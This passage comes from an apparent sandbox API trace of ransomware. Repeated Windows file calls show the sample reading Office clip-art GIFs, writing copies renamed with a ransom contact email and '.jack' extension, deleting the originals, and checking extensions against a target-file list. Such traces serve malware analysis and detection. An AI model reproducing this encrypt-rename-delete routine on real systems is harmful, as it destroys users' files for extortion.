files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 0x220 [0207.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.557] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.557] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0207.558] GetLastError () returned 0x0 [0207.558] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x1fa1, lpOverlapped=0x0) returned 1 [0207.722] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x1fb0, lpOverlapped=0x0) returned 1 [0207.723] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.723] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0207.724] SetEndOfFile (hFile=0x43c) returned 1 [0207.724] CloseHandle (hObject=0x43c) returned 1 [0207.725] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.725] SetEndOfFile (hFile=0x3d4) returned 1 [0207.726] CloseHandle (hObject=0x3d4) returned 1 [0207.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.726] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0207.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.726] lstrlenW (lpString=".doc") returned 4 [0207.726] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.726] lstrlenW (lpString=".docx") returned 5 [0207.726] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.726] lstrlenW (lpString=".pdf") returned 4 [0207.726] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.726] lstrlenW (lpString=".xls") returned 4 [0207.726] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.727] lstrlenW (lpString=".xlsx") returned 5 [0207.727] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.727] lstrlenW (lpString=".ppt") returned 4 [0207.727] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.727] lstrlenW (lpString=".zip") returned 4 [0207.727] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.727] lstrlenW (lpString=".rar") returned 4 [0207.727] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.727] lstrlenW (lpString=".bz2") returned 4 [0207.727] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.727] lstrlenW (lpString=".7z") returned 3 [0207.727] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".dbf") returned 4 [0207.728] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".1cd") returned 4 [0207.728] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".jpg") returned 4 [0207.728] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".doc") returned 4 [0207.728] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.728] lstrlenW (lpString=".docx") returned 5 [0207.728] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.728] lstrlenW (lpString=".pdf") returned 4 [0207.728] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString=".xls") returned 4 [0207.728] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString=".xlsx") returned 5 [0207.728] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.728] lstrlenW (lpString=".ppt") returned 4 [0207.728] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".zip") returned 4 [0207.728] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString=".rar") returned 4 [0207.728] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.728] lstrlenW (lpString=".bz2") returned 4 [0207.728] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.728] lstrlenW (lpString=".7z") returned 3 [0207.728] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".dbf") returned 4 [0207.728] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.728] lstrlenW (lpString=".1cd") returned 4 [0207.729] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0207.729] lstrlenW (lpString=".jpg") returned 4 [0207.729] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.729] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.729] lstrlenW (lpString="AG00090_.GIF") returned 12 [0207.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0208.761] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=517) returned 1 [0208.761] CloseHandle (hObject=0x3d4) returned 1 [0208.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 0x220 [0208.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0208.761] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.761] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0208.761] GetLastError () returned 0x0 [0208.762] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x205, lpOverlapped=0x0) returned 1 [0208.762] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x210, lpOverlapped=0x0) returned 1 [0208.763] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0208.764] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0209.339] SetEndOfFile (hFile=0x43c) returned 1 [0209.340] CloseHandle (hObject=0x43c) returned 1 [0209.340] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.340] SetEndOfFile (hFile=0x3d4) returned 1 [0209.341] CloseHandle (hObject=0x3d4) returned 1 [0209.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0209.342] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.342] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.342] lstrlenW (lpString=".doc") returned 4 [0209.342] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.342] lstrlenW (lpString=".docx") returned 5 [0209.342] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.342] lstrlenW (lpString=".pdf") returned 4 [0209.342] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.342] lstrlenW (lpString=".xls") returned 4 [0209.342] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.342] lstrlenW (lpString=".xlsx") returned 5 [0209.343] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.343] lstrlenW (lpString=".ppt") returned 4 [0209.343] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString=".zip") returned 4 [0209.343] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.343] lstrlenW (lpString=".rar") returned 4 [0209.343] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.343] lstrlenW (lpString=".bz2") returned 4 [0209.343] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.343] lstrlenW (lpString=".7z") returned 3 [0209.343] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString=".dbf") returned 4 [0209.343] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString=".1cd") returned 4 [0209.343] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString=".jpg") returned 4 [0209.343] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.343] lstrlenW (lpString=".doc") returned 4 [0209.343] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.343] lstrlenW (lpString=".docx") returned 5 [0209.344] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.344] lstrlenW (lpString=".pdf") returned 4 [0209.344] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.344] lstrlenW (lpString=".xls") returned 4 [0209.344] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.344] lstrlenW (lpString=".xlsx") returned 5 [0209.344] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.344] lstrlenW (lpString=".ppt") returned 4 [0209.344] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.344] lstrlenW (lpString=".zip") returned 4 [0209.344] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.344] lstrlenW (lpString=".rar") returned 4 [0209.344] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.344] lstrlenW (lpString=".bz2") returned 4 [0209.344] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.344] lstrlenW (lpString=".7z") returned 3 [0209.344] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.344] lstrlenW (lpString=".dbf") returned 4 [0209.344] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.344] lstrlenW (lpString=".1cd") returned 4 [0209.344] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0209.344] lstrlenW (lpString=".jpg") returned 4 [0209.344] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.345] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.345] lstrlenW (lpString="AG00120_.GIF") returned 12 [0209.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0209.345] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3484) returned 1 [0209.345] CloseHandle (hObject=0x3d4) returned 1 [0209.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 0x220 [0209.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0209.346] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.346] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0209.346] GetLastError () returned 0x0 [0209.346] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xd9c, lpOverlapped=0x0) returned 1 [0209.715] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xda0, lpOverlapped=0x0) returned 1 [0209.715] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.715] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0209.716] SetEndOfFile (hFile=0x43c) returned 1 [0209.716] CloseHandle (hObject=0x43c) returned 1 [0209.716] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.716] SetEndOfFile (hFile=0x3d4) returned 1 [0209.719] CloseHandle (hObject=0x3d4) returned 1 [0209.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.719] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0209.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.719] lstrlenW (lpString=".doc") returned 4 [0209.719] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.719] lstrlenW (lpString=".docx") returned 5 [0209.719] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.719] lstrlenW (lpString=".pdf") returned 4 [0209.719] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.719] lstrlenW (lpString=".xls") returned 4 [0209.719] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString=".xlsx") returned 5 [0209.720] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.720] lstrlenW (lpString=".ppt") returned 4 [0209.720] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString=".zip") returned 4 [0209.720] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString=".rar") returned 4 [0209.720] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString=".bz2") returned 4 [0209.720] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.720] lstrlenW (lpString=".7z") returned 3 [0209.720] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString=".dbf") returned 4 [0209.720] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString=".1cd") returned 4 [0209.720] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString=".jpg") returned 4 [0209.720] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.720] lstrlenW (lpString=".doc") returned 4 [0209.720] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.720] lstrlenW (lpString=".docx") returned 5 [0209.720] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.720] lstrlenW (lpString=".pdf") returned 4 [0209.720] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString=".xls") returned 4 [0209.720] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.720] lstrlenW (lpString=".xlsx") returned 5 [0209.720] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.720] lstrlenW (lpString=".ppt") returned 4 [0209.720] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.721] lstrlenW (lpString=".zip") returned 4 [0209.721] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.721] lstrlenW (lpString=".rar") returned 4 [0209.721] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.721] lstrlenW (lpString=".bz2") returned 4 [0209.721] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.721] lstrlenW (lpString=".7z") returned 3 [0209.721] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.721] lstrlenW (lpString=".dbf") returned 4 [0209.721] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.721] lstrlenW (lpString=".1cd") returned 4 [0209.721] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0209.721] lstrlenW (lpString=".jpg") returned 4 [0209.721] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.721] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.721] lstrlenW (lpString="AG00139_.GIF") returned 12 [0209.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0209.721] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=10607) returned 1 [0209.721] CloseHandle (hObject=0x3d4) returned 1 [0209.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 0x220 [0209.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 